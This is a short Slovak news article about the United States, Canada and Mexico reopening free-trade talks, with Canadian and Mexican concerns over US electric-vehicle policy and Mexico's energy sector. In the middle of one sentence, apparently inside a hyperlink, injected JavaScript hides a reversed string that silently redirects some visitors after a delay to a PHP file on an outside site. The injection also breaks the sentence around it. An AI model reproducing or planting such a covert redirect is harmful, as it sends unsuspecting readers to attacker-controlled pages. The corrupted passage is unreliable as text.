usa vlajka

USA, Kanada a Mexiko rokujú o prehĺbení voľného obchodu. Naraziť môžu o autopriemysel

Prvýkrát po piatich rokoch k rokovaciemu stolu zasadli zástupcovia Spojených štátov, Kanady a Mexika. Cieľom je prehĺbenie vzájomnej ekonomickej spolupráce. Kanada a Mexiko sa ale obávajú amerických požiadaviek v oblasti automobilového priemyslu.

Spojené štáty sú najväčším obchodným partnerom ako Kanady, tak Mexika. A medzi týmito krajinami je v rámci vzájomného obchodu na jednom z popredných miest automobilový priemysel. Práve preto sa dá očakávať, že pri obchode s automobilmi sa môže objaviť zádrhel. Kanada s Mexikom sa obávajú plánovanej podpory elektromobility zo strany administratívy Joea Bidena, čo môže viesť k uprednostňovaniu amerických $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do-setrnejsich-technologii-pre-tazbu-litia/“>výrobcov vozidiel pred tými zo zvyšných dvoch krajín.

Kanada aj Mexiko tak budú po USA požadovať, aby sa ich firmy stali súčasťou dodávateľského reťazca v oblasti výroby elektromobilov. Mexický prezident Andres Manuel Lopet Obrador tiež bude požadovať, aby sa mexický energetický sektor nestal prílišným cieľom súkromných investorov, respektíve aby mexická vláda hrala v energetike aj naďalej prím. Mexiko totiž nechce dopustiť, aby presadzovanie elektromobility viedlo v konečnom dôsledku k rastu cien energií.

Jeden komentář

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *